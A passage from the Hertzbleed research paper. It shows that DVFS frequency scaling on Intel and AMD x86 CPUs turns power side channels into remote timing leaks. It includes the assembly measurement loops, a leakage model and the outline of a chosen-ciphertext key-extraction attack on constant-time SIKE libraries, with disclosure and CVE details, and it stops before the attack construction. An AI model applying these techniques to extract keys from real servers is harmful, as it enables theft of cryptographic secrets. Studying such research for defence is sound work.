Hertzbleed: Turning Power Side-Channel Attacks Into Remote Timing Attacks on x86 Abstract Power side-channel attacks exploit data-dependent varia- tions in a CPU’s power consumption to leak secrets. In this paper, we show that on modern Intel (and AMD) x86 CPUs, power side-channel attacks can be turned into timing attacks that can be mounted without access to any power measure- ment interface. Our discovery is enabled by dynamic voltage and frequency scaling (DVFS). We find that, under certain circumstances, DVFS-induced variations in CPU frequency depend on the current power consumption (and hence, data) at the granularity of milliseconds. Making matters worse, these variations can be observed by a remote attacker, since frequency differences translate to wall time differences! The frequency side channel is theoretically more powerful than the software side channels considered in cryptographic engineering practice today, but it is difficult to exploit because it has a coarse granularity. Yet, we show that this new channel is a real threat to the security of cryptographic software. First, we reverse engineer the dependency between data, power, and frequency on a modern x86 CPU—finding, among other things, that differences as seemingly minute as a set bit’s position in a word can be distinguished through frequency changes. Second, we describe a novel chosen-ciphertext at- tack against (constant-time implementations of) SIKE, a post- quantum key encapsulation mechanism, that amplifies a sin- gle key-bit guess into many thousands of high- or low-power operations, allowing full key extraction via remote timing. 1 Introduction Power-analysis attacks have been known for decades to be a powerful source of side channel information leakage. His- torically, these attacks were used to leak cryptographic se- crets from embedded devices like smart cards using physical probes [3,39,59,68,74,75]. Recently, however, power-analysis attacks have been shown to be exploitable also via software power measurement interfaces. Such interfaces, available ∗These authors contributed equally to this work. on many of today’s general-purpose processors, have been abused to fingerprint websites [95], recover RSA keys [70], break KASLR [63], and even recover AES-NI keys [64]. Fortunately, software-based power-analysis attacks can be mitigated and easily detected by blocking (or restricting [10]) access to power measurement interfaces. Up until today, such a mitigation strategy would effectively reduce the attack sur- face to physical power analysis, a significantly smaller threat in the context of modern general-purpose x86 processors. In this paper, we show that, on modern Intel (and AMD) x86 CPUs, power-analysis attacks can be turned into timing attacks—effectively lifting the need for any power measure- ment interface. Our discovery is enabled by the aggressive dy- namic voltage and frequency scaling (DVFS) of these CPUs. DVFS is a commonly-used technique that consists of dynami- cally adjusting CPU frequency to reduce power consumption (during low CPU loads) and to ensure that the system stays below power and thermal limits (during high CPU loads). We find that, under certain circumstances, DVFS-induced CPU frequency adjustments depend on the current power consump- tion at the granularity of milliseconds. Therefore, since the power consumption is data dependent, it follows transitively that CPU frequency adjustments are data dependent too. 
Making matters worse, we show that data-dependent fre- quency adjustments can be observed without the need for any special privileges and even by a remote attacker. The reason is that CPU frequency differences directly translate to execution time differences (as 1 hertz = 1 cycle per second). The security implications of this finding are significant. For example, they fundamentally undermine constant-time programming, which has been the bedrock defense against timing attacks since their discovery in 1996 [58]. The premise behind constant-time programming is that by writing a program to only use “safe” instructions, whose latency is invariant to the data values, the program’s execution time will be data-independent. With the frequency channel, however, timing becomes a function of data—even when only safe instructions are used. Despite its theoretical power, it is not obvious how to con- struct practical exploits through the frequency side channel. This is because DVFS updates depend on the aggregate power consumption over millions of CPU cycles and only reflect coarse-grained program behavior. Yet, we show that the fre- quency side channel is a real threat to the security of crypto- graphic software, by (i) reverse engineering a precise leakage model for this channel on modern x86 CPUs, and (ii) showing that some cryptographic primitives admit amplification of single key bit guesses into thousands of high- or low-power operations, enough to induce a measurable timing difference. To construct a leakage model, we reverse engineer the de- pendency between data being computed on and power con- sumption / frequency on modern x86 Intel CPUs. Our results reveal that power consumption and CPU frequency depend on both the Hamming weight (HW) of data being processed and the Hamming distance (HD) of data across computations. We show, for the first time, that these two effects are distinct and additive on modern Intel CPUs. Further, the HW effect is non uniform. That is, computing on data with the same HW results in differences in power consumption / frequency depending on the position of individual 1s within data values. The take- away is that computing on data with different bit patterns depending on a secret can result in different power consump- tions and frequencies depending on that secret. We expect that this information will also be useful towards building future, Intel-specific power leakage emulators [11,60,72,87,89]. We find that AMD x86 CPUs also feature a similar leakage model, but leave reverse engineering its details to future work. We then describe a novel attack, including new cryptana- lytic techniques, on two production-ready, constant-time im- plementations of SIKE (Supersingular Isogeny Key Encap- sulation [52]). SIKE is a decade old, widely studied key en- capsulation mechanism. Unlike other finalists in NIST’s Post- Quantum Cryptography competition, SIKE has both short ciphertexts and short public keys — and a “well-understood” side channel posture [20]. In our attack, we show that, when provided with a specially-crafted input, SIKE’s decapsula- tion algorithm produces anomalous 0 values that depend on single bits of the key. Worse so, these values cause the algo- rithm to get stuck and operate on intermediate values that are also 0 for the remainder of the decapsulation. When this hap- pens, the processor consumes less power and runs at a higher frequency than usual, and therefore decapsulation takes a shorter wall time. 
This timing signal is so robust that key extraction is possible across a network, as we demonstrate for the SIKE implementations in both Cloudflare’s Interop- erable Reusable Cryptographic Library (CIRCL) [28] and Microsoft’s PQCrypto-SIDH [66]. Our unoptimized version of the attack recovers the full key from these libraries in 36 and 89 hours, respectively. Finally, we show that the frequency side channel can also be used to mount timing attacks without a timer, such as a KASLR break and a covert channel. Disclosure We disclosed our findings, together with proof- of-concept code, to Intel, Cloudflare and Microsoft in Q3 2021 and to AMD in Q1 2022. The attack was assigned CVE-2022- 23823 and CVE-2022-24436 and held under embargo until June 14, 2022. Intel committed to awarding us a bug bounty. Cloudflare and Microsoft deployed a mitigation to CIRCL and PQCrypto-SIDH, respectively. 2 Background and Related Work Intel P-States In Intel processors, dynamic voltage and fre- quency scaling (DVFS) works at the granularity of P-states. P-states correspond to different operating points (voltage- frequency pairs) in 100 MHz frequency increments [49]. The number of P-states varies across different CPU models. Mod- ern Intel processors offer two mechanisms to control P-states, namely SpeedStep and Speed Shift / Hardware Controlled Per- formance States (HWP). With SpeedStep, P-states are man- aged by the operating system (OS) using hardware coordina- tion feedback registers. With HWP, P-states are managed en- tirely by the processor, increasing the overall responsiveness. HWP was introduced with the Skylake microarchitecture [78]. When HWP is enabled, the OS can only give hints to the pro- cessor’s internal P-state selection logic, including restricting the range of available P-states [91]. Otherwise, the available range of P-states depends only on the number of active cores and on whether “Turbo Boost” is enabled [55]. Our P-state naming convention follows the one used in Linux [91].1 The lowest P-state corresponds to the lowest supported CPU fre- quency. The highest P-state corresponds to the “max turbo” frequency for the processor. However, when Turbo Boost is disabled, the highest available P-state is the base frequency. We use the term P-state and frequency interchangeably. P-state management is also related to power management. Each Intel processor has a Thermal Design Point (TDP), indi- cating the expected power consumption at steady state under a sustained workload [22, 40]. While in the max turbo mode, the processor can exceed its nominal TDP [47]. However, if the CPU hits a certain power and thermal limit while in max turbo mode, the hardware will automatically downclock the frequency to stay at TDP for the duration of the workload. Data-Dependent Power Consumption It is well-known that a processor’s power consumption depends on the data being processed [46, 68]. The precise dependency between data and power consumption depends on the processor’s im- plementation, but can be approximated using leakage mod- els. Two commonly-used leakage models are the Hamming distance (HD) [9, 61, 68, 71, 77] and the Hamming weight (HW) [56, 61, 67, 71, 73, 74, 88] models. In the HD model, power consumption depends to the number of 1 → 0 and 0 → 1 bit transitions occurring in the data during a computa- tion. In the HW model, power consumption just depends on the number of bits that are 1 in the data being processed. 1However, Intel refers to higher frequencies as lower P-states [48, 50]. 
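Concretely, both leakage models reduce to bit counts over the operands. A minimal C sketch (assuming 64-bit operands and a compiler that provides __builtin_popcountll, e.g., GCC or Clang; this is an illustration, not code from the systems cited above):

#include <stdint.h>

/* Hamming weight: number of 1 bits in a value. */
static inline int hw(uint64_t v) {
    return __builtin_popcountll(v);
}

/* Hamming distance: number of bit positions that flip between two
 * consecutively processed values. */
static inline int hd(uint64_t prev, uint64_t next) {
    return __builtin_popcountll(prev ^ next);
}

For example, hd(0x0F, 0xF0) = 8 even though both values have hw = 4, which is why the two models can capture distinct effects.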
Table 1: CPUs tested in our experimental setups.

  CPU Model    Microarchitecture     Cores   Base Frequency   Max Turbo Frequency
  i7-8700      Coffee Lake           6       3.20 GHz         4.60 GHz
  i7-9700      Coffee Lake Refresh   8       3.00 GHz         4.70 GHz
  i9-10900K    Comet Lake            10      3.70 GHz         5.30 GHz
  i7-11700     Rocket Lake           8       2.50 GHz         4.90 GHz
  i7-10850H    Comet Lake (mobile)   6       2.70 GHz         5.10 GHz
  i7-1185G7    Tiger Lake (mobile)   4       3.00 GHz         4.80 GHz

Power Side-Channel Attacks Power side-channel attacks against cryptosystems were first publicly discussed by Kocher in 1998 [59]. His work introduced analytical techniques that exploit the data dependency of power consumption to reveal secret keys. Following works demonstrated power-analysis attacks against several cryptographic algorithms including AES [14, 67], DES [74], RSA [30, 75, 80, 94], and ElGamal [16, 30].2 However, all these attacks targeted smart cards and required physical access to the device. More recently, power side-channel attacks have been applied also to more complex devices such as smartphones [15, 35, 76, 92, 93] and PCs [36, 63, 64, 70, 95]. Some of these attacks rely only on software power measurement interfaces, meaning that they do not need proximity to the device. However, while some of these works use the HW and HD leakage models [64, 70], none of them presents a systematic reverse engineering of the dependency between power consumption and data on modern Intel x86 CPUs. Further, all these attacks can be blocked by restricting access to such power measurement interfaces.

2 For a comprehensive survey of these attacks, we refer to prior work [68].

3 CPU Frequency Leakage Channel

In this section, we analyze the leakage from CPU frequency variations on modern Intel processors. We show that, under certain circumstances, the distribution of a processor's frequencies leaks information about the instructions being executed as well as the data being processed.

Experimental Setup We run our experiments on several different machines. The characteristics of the CPU of each machine are reported in Table 1. All our machines run Ubuntu with versions either 18.04 or 20.04, kernel either 4.15 or 5.4, and the latest microcode patches installed. Unless otherwise noted, we use the default system configuration, without restricting the P-states. To monitor CPU frequency, we use the MSR_IA32_MPERF and MSR_IA32_APERF registers, as done in the Linux kernel [62]. To monitor power consumption, we use the MSRs of the RAPL interface, following Weaver [90].

3.1 Distinguishing Instructions

As a first step for our analysis, we set out to understand how running different workloads affects the P-state selection logic of our CPUs. We pick two workloads from the stress-ng benchmark suite [57]. The first workload consists of 32-bit integer and floating-point operations (int32float method), while the second workload consists of only 32-bit integer operations (int32 method). We run both benchmarks on all cores, starting from an idle machine.

Figure 1: Example of distinguishing workloads using frequency traces on our i7-9700 CPU. The lighter workload (int32) allows for longer runtimes at higher frequencies than the heavier workload (int32float). (a) Run of the int32float test; (b) run of the int32 test. [Plots of frequency (GHz) and power (W) versus time (s).]
We sample the CPU frequency and the (package domain) power consumption every 5 ms during the benchmark's execution.

Figure 1a shows the results for the int32float test on our i7-9700 CPU. The frequency starts at 4.5 GHz, the highest P-state available when all cores are active on our CPU. This frequency is sustained for about 8 seconds, during which the power consumption is allowed to exceed the TDP. Then, the CPU drops to a lower P-state, bringing the power consumption down to TDP (65 W on our CPU). From there onwards, the CPU remains in steady state and power stays around the TDP level for the duration of the workload. In our example, at steady state the frequency oscillates between two P-states, corresponding to the frequencies of 3.9 GHz and 4.0 GHz.

Figure 1b shows the results for the int32 stress test. Here too, the frequency starts at 4.5 GHz and later drops to a lower P-state. However, compared to Figure 1a, (i) the drop occurs later, after 10 seconds, and (ii) the P-states used after the drop are higher, corresponding to 4.0 GHz and 4.1 GHz. This is because the power consumption of the int32 test is lower. As a consequence, not only can the processor sustain the highest available P-state for longer, but it can also use higher P-states in steady state without exceeding the TDP.

The key takeaway from the above results is that both (i) the time that a processor can spend at the maximum available P-state and (ii) the distribution of P-states at steady state depend on the CPU power consumption. Since the CPU power consumption depends on the workload, by the transitive property it follows that P-states depend on the workload too. This implies that dynamic scaling of P-states leaks information about the current workload running on the processor.

Figure 2: Distinguishing data (in the source register to a shlx instruction) using frequency traces on our i7-9700 CPU. Figure 2a is over 30,000 samples. Figure 2b is over 100 traces. (a) Frequency at steady state; (b) seconds before steady state. [Histograms for hw=16, hw=32, and hw=48.]

3.2 Distinguishing Data

We saw that P-state information leaks information about the instructions being executed (i.e., the workload). We now explore if the frequency leakage channel can leak information about the data being processed by instructions. Our question is motivated by the fact that power consumption on x86 processors is known to be data dependent [64]. It is thus natural to ask: do data-dependent differences in power consumption show in the distribution of P-states?

To answer this question, we monitor the CPU frequency while executing the same instructions and only changing the content of the input registers. For example, we use the shlx instruction to continuously shift left the bits of a source register and write the result into different destination registers in a loop, while only varying the content of the source register. We run this experiment on all cores and compare the distribution of the P-states in steady state.

Figure 2a shows the results when we set the content of the source register to have 16, 32 or 48 ones. In all cases the P-state oscillated between 4.3 GHz and 4.4 GHz. However, the larger the Hamming weight, the more the frequency stayed at the lower P-state. We also saw a data-dependent difference in terms of when the frequency drops to steady state if we start from idle (cf. Figure 2b).
The larger the Hamming weight, the quicker the frequency drops to steady state. This is because, as we show in Section 4, pro- cessing data with larger Hamming weights consumes more power than processing data with lower Hamming weights. We get similar results with other instructions too. For ex- ample, we observed data-dependent effects when running or, xor, and, imul, add, sub, as well as when computing on data loaded from memory. The only caveat is that, for some in- structions, the power consumption of just running the target instruction in a loop on all cores was not large enough to cause the P-state to ever drop to steady state. In these cases, we ran an additional, fixed workload in the background to push the total power consumption up. The key takeaway of the above results is that dynamic scaling of P-states leaks information about the data being processed. In the following sections, we use the distribution of P-states at steady state as our leakage channel. 4 CPU Frequency Leakage Model We saw that the power consumption and the distribution of P-states in Intel CPUs depend on the data being processed. The goal of this section is to construct a leakage model of this behavior. To this end, we reverse engineer the dependency be- tween power consumption/frequency and data on the ALU of modern Intel CPUs. As we show in Section 5, this information can help an attacker construct side-channel attacks. Scope Precisely understanding where power is dissipated as a function of data on general-purpose x86 processors is a challenging task. The reason is that the microarchitecture of modern x86 processors is (i) highly complex and (ii) largely undocumented. Fortunately, studying the power consumption across all microarchitectural units is not necessary to build attacks. This is because the vast majority of computations performed by modern, constant-time cryptographic software occurs in the arithmetic logic unit (ALU). Since our primary goal is to build a model that is useful to leak secrets from constant-time cryptographic code, the analysis in this section focuses specifically on the ALU component. Methodology We use the experimental setup of Section 3. In each experiment, we run a fixed set of ALU instructions (the sender) in a loop on all cores, while varying the input contents. We carefully design our senders to target specific behaviors and minimize side effects. First, to reduce power consumption from other core units such as the cache, we always use register to register instructions without any mem- ory access. Second, to avoid any datapath contamination ef- fects caused by incrementing the loop counter variable and evaluating loop conditions, we run our sender in an infinite loop that we manually terminate at the end of the experiment. Third, to avoid introducing unintended HD effects, we inter- leave different instructions in such a way that encourages full throughput on all available ports [1, 2]. Finally, we run each sender in two setups. In the first setup, we use the default system configuration, warm up the machine until it enters steady state, and monitor the frequency. In the second setup, we disable SpeedStep / HWP (this way, our processor stays at the base frequency for the duration of the workload) and monitor the (core domain) power consumption. We sample power/frequency every 1 ms, collect 30,000 data points for each experiment and use their mean for our analyses. 
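For reference, the frequency sampling used throughout Sections 3 and 4 can be approximated by reading MSR_IA32_MPERF (0xE7) and MSR_IA32_APERF (0xE8) through Linux's msr driver: the ratio of the APERF and MPERF deltas gives the average effective frequency relative to the base frequency. The sketch below assumes the msr module is loaded, root privileges, core 0, a placeholder 3.6 GHz base frequency, and a 1 ms interval; it is not the exact harness used for our measurements.

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

static uint64_t rdmsr(int fd, uint32_t reg)
{
    uint64_t val = 0;
    if (pread(fd, &val, sizeof(val), reg) != (ssize_t)sizeof(val))
        return 0;
    return val;
}

int main(void)
{
    const double base_ghz = 3.6;                 /* assumed base frequency */
    int fd = open("/dev/cpu/0/msr", O_RDONLY);   /* needs 'modprobe msr' and root */
    if (fd < 0) { perror("open msr"); return 1; }

    uint64_t m0 = rdmsr(fd, 0xE7);   /* IA32_MPERF: counts at base frequency */
    uint64_t a0 = rdmsr(fd, 0xE8);   /* IA32_APERF: counts at actual frequency */
    for (int i = 0; i < 1000; i++) {
        usleep(1000);                /* ~1 ms sampling interval */
        uint64_t m1 = rdmsr(fd, 0xE7), a1 = rdmsr(fd, 0xE8);
        printf("%.3f GHz\n", base_ghz * (double)(a1 - a0) / (double)(m1 - m0));
        m0 = m1; a0 = a1;
    }
    close(fd);
    return 0;
}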
4.1 Hamming Distance (HD) Effect

To start, we set out to understand if the number of 1 → 0 and 0 → 1 transitions affects power consumption / frequency. Recall that these transitions depend on the number of bits that differ (also known as the HD) between consecutive data values being processed. To study the dependency between HD and power consumption / frequency, we then need a sender that offers fine-grained control over the number of transitions, while avoiding other potential side effects. For example, testing different HDs should not require changing the number of 1s in the input (which, as we show below, is a separate effect).3

3 This requirement implies that approaches such as using a xor instruction to cause bit transitions are not suitable, because triggering different numbers of transitions would also require using different numbers of 1s in the input.

(a) Sender for our HD experiments:
    rax = COUNT
    rbx = 0x0000FFFFFFFF0000
    loop:
        shlx %rax,%rbx,%rcx   // rcx = rbx << rax
        shlx %rax,%rbx,%rdx   // rdx = rbx << rax
        shrx %rax,%rbx,%rsi   // rsi = rbx >> rax
        shrx %rax,%rbx,%rdi   // rdi = rbx >> rax
        shlx %rax,%rbx,%r8    // r8  = rbx << rax
        shlx %rax,%rbx,%r9    // r9  = rbx << rax
        shrx %rax,%rbx,%r10   // r10 = rbx >> rax
        shrx %rax,%rbx,%r11   // r11 = rbx >> rax
        jmp loop

(b) Sender for our HW experiments:
    rax = LEFT
    rcx = ... = r11 = RIGHT
    loop:
        or %rax,%rcx          // rcx = rax | rcx
        or %rax,%rdx          // rdx = rax | rdx
        or %rax,%rsi          // rsi = rax | rsi
        or %rax,%rdi          // rdi = rax | rdi
        or %rax,%r8           // r8  = rax | r8
        or %rax,%r9           // r9  = rax | r9
        or %rax,%r10          // r10 = rax | r10
        or %rax,%r11          // r11 = rax | r11
        jmp loop

(c) Sender for our HW+HD experiments:
    rax = rcx = rdx = rsi = rdi = FIRST
    rbx = r8 = r9 = r10 = r11 = SECOND
    loop:
        or %rax,%rcx          // rcx = rax | rcx
        or %rax,%rdx          // rdx = rax | rdx
        or %rax,%rsi          // rsi = rax | rsi
        or %rax,%rdi          // rdi = rax | rdi
        or %rbx,%r8           // r8  = rbx | r8
        or %rbx,%r9           // r9  = rbx | r9
        or %rbx,%r10          // r10 = rbx | r10
        or %rbx,%r11          // r11 = rbx | r11
        jmp loop

Figure 3: Different sets of instructions (senders) used to reverse engineer the dependency between data and power consumption / frequency on our CPUs. Different senders are designed to target different effects. Each sender can be run with variable inputs.

Figure 4: Effect of increasing COUNT in Figure 3a's sender on our i7-9700 CPU. Higher COUNT values cause higher HDs in the ALU output. As the HD increases, the mean power consumption grows and the mean steady-state frequency drops. (a) Frequency vs COUNT; (b) power vs COUNT.

We design our sender to use interleaved shlx and shrx instructions, as shown in Figure 3a. These instructions shift the bits of the second source register to the left or right by a COUNT value stored in the first source register. The result is written to a separate destination register. Since on our CPUs shlx and shrx execute on port 0 and port 6 [1], we interleave them in groups of two. We fix the content of the second source register to 0x0000ffffffff0000, corresponding to 16 zeros, followed by 32 ones, followed by 16 zeros. We then shift this register left and right by COUNT (with 0 ≤ COUNT ≤ 16). By construction, the HD in the ALU output between a shlx and a shrx is 4×COUNT. For example, when COUNT = 8, the output of each shlx is 0x00ffffffff000000, and the output of each shrx is 0x000000ffffffff00, translating to 4×8 bit transitions in the ALU output. Yet, the ALU input remains unchanged and the number of 1s in the source and the destination registers is fixed.4

4 The only other variable is the number of 1s in the COUNT register itself, which varies between 1 and 4. However, this effect is negligible.
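The 4×COUNT property can be checked directly on the operand values, independently of any measurement; a small self-contained C check (the shifts below mirror what the shlx/shrx instructions in Figure 3a write to their destination registers):

#include <assert.h>
#include <stdint.h>

int main(void)
{
    const uint64_t src = 0x0000ffffffff0000ULL;   /* rbx in Figure 3a */
    for (int count = 0; count <= 16; count++) {
        uint64_t shl_out = src << count;          /* what each shlx writes */
        uint64_t shr_out = src >> count;          /* what each shrx writes */
        /* HD between the two ALU outputs is exactly 4*COUNT */
        assert(__builtin_popcountll(shl_out ^ shr_out) == 4 * count);
    }
    return 0;
}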
Figure 4 shows the results when we vary the COUNT value. We see that the power consumption grows and the frequency drops when COUNT grows, confirming that the number of bit transitions directly affects power consumption and frequency. In Appendix A.1, we corroborate this observation with an additional experiment where transitions occur in the ALU input. These results are consistent on all the CPUs of Table 1.

1. Larger Hamming distances between data values being processed contribute to larger power consumptions and lower steady-state frequencies.

4.2 Hamming Weight (HW) Effect

We now set out to understand if the HW of the data values being processed affects power consumption / frequency. Recall that the idea behind the HW model is that power consumption depends on the number of 1s in the data being processed. To study the dependency between HW and power consumption / frequency, we need a sender that offers fine-grained control over the number of 1s, while avoiding other potential side effects. For example, testing different HWs should not require bit transitions in the data (i.e., the HD effect).

To satisfy the above requirements, we design a sender that uses or logic instructions, as shown in Figure 3b. These instructions perform a bitwise inclusive or operation between the source register and the destination register, and store the result in the destination register. We always use the same input and output registers for all the or instructions in the loop. We fix the content of the source register to LEFT, and set the initial content of the output register to RIGHT.

By construction, the number of bit transitions occurring on the ALU input and output during the execution of the above sender is zero. The reason is that all or instructions take the same inputs and produce the same output during an experiment. Hence, we can test different HW in the source registers without introducing any HD effects. An added benefit of using or instructions is that they allow us to study the effects of changing some bits of the input register (LEFT) without affecting the contents of the output register (RIGHT). We use this sender to perform multiple experiments.

Figure 5: Effect of varying the number of consecutive 1s in the LEFT = RIGHT input to Figure 3b's sender on our i7-9700 CPU. As we increase the number of 1s, the mean power consumption grows and the mean steady-state frequency drops. (a) Frequency vs HW; (b) power vs HW, with 1s filling either from the LSB or from the MSB.
Figure 5 shows the results when the HW grows from 0 to 64, both when the 1s start from the least significant bit (LSB) and when they start from the most significant bit (MSB). In both cases, the power consumption grows and the frequency drops when the HW grows. 2. A larger number of leading or trailing 1s in the data values being processed contributes to larger power con- sumptions and lower steady-state frequencies. We also see that the changes in power consumption and frequency appear to be nonlinear. That is, the plots of Figure 5 have a “bow” shape, suggesting that the HW effect is stronger for the most significant 32 bits than for the least significant 32 bits. For example, when the input is 0xffffffff00000000 (HW=32, orange line), the HW effect is larger than when it is 0x00000000ffffffff (HW=32, blue line). This suggests that given data values with the same HW, their contribution power / frequency may also depend on the position of 1s. We thoroughly examine this observation later in this subsection. Non-consecutive 1s The above experiment shows that power consumption and frequency can depend on the HW of the data being processed. However, it only focuses on a bit pattern of consecutive 1s and 0s. In reality, 1s and 0s might occur in anywhere in the data. For our model to be useful, we need to test if the HW effect applies to arbitrary bit patterns. To analyze the HW effect in the presence of non- consecutive 1s, we run a variant of our previous experiment, where we increase the HW at byte granularity. That is, we break the 64-bit registers LEFT = RIGHT into 8 bytes and 0 2 4 6 8 Hamming weight 4.12 4.14 4.16 Frequency (GHz) (a) Frequency vs HW 0 2 4 6 8 Hamming weight 26.25 26.50 26.75 27.00 27.25 Power (W) (b) Power vs HW Figure 6: Effect of varying the number of non-consecutive 1s in the LEFT = RIGHT input to Figure 3b’s sender on our i7- 9700 CPU. The results confirm that larger HWs cause higher power consumptions and lower steady-state frequencies. 0 1 2 3 4 5 6 7 Byte index 0.008 0.006 0.004 Frequency (GHz) (a) Effect of 0xFF to frequency 0 1 2 3 4 5 6 7 Byte index 0.10 0.15 0.20 Power (W) (b) Effect of 0xFF to power Figure 7: Effect of setting single bytes to 0xff in the LEFT = RIGHT input to Figure 3b’s sender on our i7-9700 CPU. The effect varies depending on the position of 1s within the inputs. HW differences in the MSBs have the strongest effect; HW differences in the bits right below 32 have the weakest effect. vary the HW within each byte. Increasing the HW within each byte allows us to measure the impact of different num- bers of non-consecutive 1s. For example, when the HW for each byte is 2, we set 2 bits of each byte to 1, for a total HW of 2×8 = 16. Figure 6 shows the results, clearly indicating that a larger number of non-consecutive 1s contributes to a larger power consumption and lower CPU frequency. 3. A larger Hamming weight (number of 1s) in the data values being processed contributes to larger power con- sumptions and lower steady-state frequencies regardless of whether the 1s are consecutive or not. Non-uniformity of the HW Effect To analyze the impact of the position of 1s within the data, we run another variant of our previous experiment. We break the 64-bit registers LEFT = RIGHT into 8 bytes. Each byte can be set to 0x00 (all 0s) or 0xff (all 1s). When we target byte i, we fix the value of the other 7 bytes and compute the delta of power consumption / frequency between setting byte i to 0xff and 0x00. 
For each byte, we repeat this test with all the 2^7 combinations of the other 7 bytes. We compute the average and standard deviation of the deltas for each byte and show the result in Figure 7.

We immediately see that the HW effect is non-uniform across different bytes. At a high level, the 4 most significant bytes have a stronger HW effect than the 4 least significant bytes, and bytes closer to the 32nd bit have a weaker HW effect than bytes farther from the 32nd bit. This is consistent with our previous observation that an input where the most significant 32 bits are 1 consumes more power than an input where the least significant 32 bits are 1, even if their HWs are the same. Further, the standard deviations are relatively small, suggesting that the HW effect of each byte is independent of the values of other bytes. For example, the power/frequency deltas between 0x0000ff0000000000 and 0x0000000000000000 are the same as the ones between 0xff00ffff00ffffff and 0xff0000ff00ffffff. We suspect that these properties also hold at bit granularity, but are unable to confirm this because it would require collecting data for 2^64 bit combinations, for a runtime of more than 10^13 years. Note that the difference in the HW effect due to the position of 1s is relatively small (e.g., ≤ 0.12 W in Figure 7b) compared to the difference in the HW effect due to the number of 1s (e.g., ≤ 1.11 W in Figures 5b and 6b) and the HD effect due to bit transitions (e.g., ≤ 0.75 W in Figure 4b).

4. The HW effect is non-uniform. 1s in the most significant bytes affect power and frequency more than 1s in the least significant bytes. Additionally, the HW effect at each byte is independent of the values of other bytes.

The above experiments show that power consumption and frequency depend both on the number and the positions of 1s in the data being processed. However, both experiments were designed using LEFT = RIGHT, meaning that all the source and destination registers used by the sender during an experiment were the same. It is then natural to ask: does the HW effect occur even when LEFT ≠ RIGHT? To answer this question, we repeated the above two experiments, but this time set LEFT = 0 and only varied the HW of RIGHT.5 Both experiments yielded results similar to the ones where LEFT = RIGHT, albeit with smaller increments/decrements in power/frequency. This result shows that the HW effect on an operand is independent of the contents of other operands.

5 Whether LEFT = 0 or LEFT = RIGHT, the result of the or is still RIGHT.

5. The HW effect occurs on each operand independently.

To sum up, the HW effect may be approximated as a linear combination of two vectors. The first vector is the number of 1s per byte, and the second vector is the non-uniform power consumption / frequency "cost" of 1s in that byte (based on the deltas of Figure 7). In Appendix A.1 we discuss additional experiments in support of this model. We verified that this model applies to all the CPUs of Table 1. However, the non-uniform "costs" per byte of the HW effect can be different across CPU models. For example, in the 11th gen CPUs, the HW effect is more uniform compared to Figure 7.

Figure 8: Effect of increasing the HW of SECOND in Figure 3c's sender, while fixing FIRST to different values (A, B, C, or D) on our i7-9700 CPU. Power consumption grows and steady-state frequency drops when both HW and HD increase at the same time (net effect of HW+HD). However, power consumption drops and steady-state frequency grows when HW increments correspond to HD decrements (net effect of HW−HD). (a) Frequency vs HW of SECOND; (b) power vs HW of SECOND.
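In code, the per-byte approximation summarized above (plus the HD term from Section 4.1) might look as follows. The per-byte weights and the HD coefficient are illustrative placeholders shaped like Figure 7 (strongest for the most significant bytes, weakest just below bit 32), not calibrated values from our CPUs:

#include <stdint.h>

/* Rough relative leakage estimate for one 64-bit operand transition,
 * combining a per-byte-weighted HW term with an HD term. */
static double leakage_estimate(uint64_t prev, uint64_t cur)
{
    /* assumed per-byte HW "cost" (byte 0 = least significant byte) */
    static const double byte_weight[8] =
        { 0.12, 0.10, 0.08, 0.07, 0.13, 0.15, 0.17, 0.19 };
    const double hd_weight = 0.05;   /* assumed cost per flipped bit */

    double leak = 0.0;
    for (int b = 0; b < 8; b++)
        leak += byte_weight[b] *
                __builtin_popcountll((cur >> (8 * b)) & 0xff);
    leak += hd_weight * __builtin_popcountll(prev ^ cur);
    return leak;   /* arbitrary units */
}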
4.3 Additivity of the HW and HD Effects

Finally, we set out to understand if the HD and HW effects are additive. To this end, we design our sender to use or instructions with interleaved operand contents, as shown in Figure 3c. In this sender, half of the instructions compute FIRST|FIRST and the other half compute SECOND|SECOND. We interleave these instructions in groups of four, since on our CPUs or instructions use four ports [1]. We then test setting FIRST to be A = 0x000000000000ffff, B = 0xffff000000000000, C = 0x00000000ffffffff, or D = 0xffffffff00000000, and increase the HW of SECOND from 0 to 64, starting from the least significant bit.

Figure 8 shows the results. Consider the case when FIRST = C. As the HW of SECOND increases from 0 to 32, the HD between FIRST and SECOND decreases, causing the power consumption to drop and the frequency to grow. However, as the HW of SECOND increases from 32 to 64, the HD between FIRST and SECOND increases, causing the opposite effect. The slope between 0 and 32 is smaller than the one between 32 and 64. This is because the former is a net effect of HW minus HD whereas the latter is a net effect of HD plus HW. For the other values of FIRST, we see analogous effects but with different constant offsets. This result (consistent across the CPUs of Table 1) shows that the HW and the HD effects can simultaneously contribute to power and frequency.

6. The HD and HW effects are additive and can simultaneously contribute to differences in power consumption and steady-state frequency.

5 Remote Timing Attack on SIKE

The previous sections have shown that carefully crafted instruction sequences can trigger data-dependent power consumption and frequency differences. In this section, we show that the frequency side channel threat extends to in-the-wild software. Specifically, we show how to use the frequency side channel, combined with novel cryptanalysis, for a full key recovery attack through remote timing on two production-ready, side-channel hardened implementations of Supersingular Isogeny Key Encapsulation (SIKE) [52], a post-quantum key encapsulation mechanism based on the Supersingular Isogeny Diffie-Hellman (SIDH) [53] key exchange protocol.

Attack Model We assume a chosen-ciphertext attack model (CCA). The goal of the attacker (client) is to recover the static secret key used by the victim (server) to decapsulate ciphertexts. The attacker can send many ciphertexts to the victim, which always tries to compute the shared secret with the decapsulation procedure using its static secret key.

Attack Idea The server's static secret key is an integer m with bit expansion m = (mℓ−1, ..., m0)2, where ℓ = 378 (for SIKE-751, the parameter selection we target in our experiments). During decapsulation, the server computes P+[m]Q for elliptic curve points P and Q included in the ciphertext; the SIKE standard prescribes a particularly efficient algorithm for evaluating this expression, the Montgomery three-point ladder [29]. We show that an attacker who knows the i least significant bits of m can construct points P and Q such that:

• If mi ≠ mi−1, then the (i+1)st round of the Montgomery three-point ladder produces an anomalous 0 value.
Once that anomalous 0 value appears, the decapsulation algorithm gets stuck: every intermediate value produced for the remainder of the ladder is 0. Additionally, every intermediate value produced for the function (isogeny computation) following the ladder is also 0.

• If, however, mi = mi−1, or if the attacker was wrong about the i least significant bits of m when constructing the challenge ciphertext, then the (i+1)st round generates a non-0 value. Heuristically, the remainder of the computation proceeds without producing an anomalous 0 value except with negligible probability.

This observation is new, and it represents a core contribution of our work. Because SIKE is built on somewhat abstruse math, we defer the details of how to construct points P and Q that trigger an anomalous 0 value, and why a 0 value causes the decapsulation algorithm to get stuck, to Section 5.3.

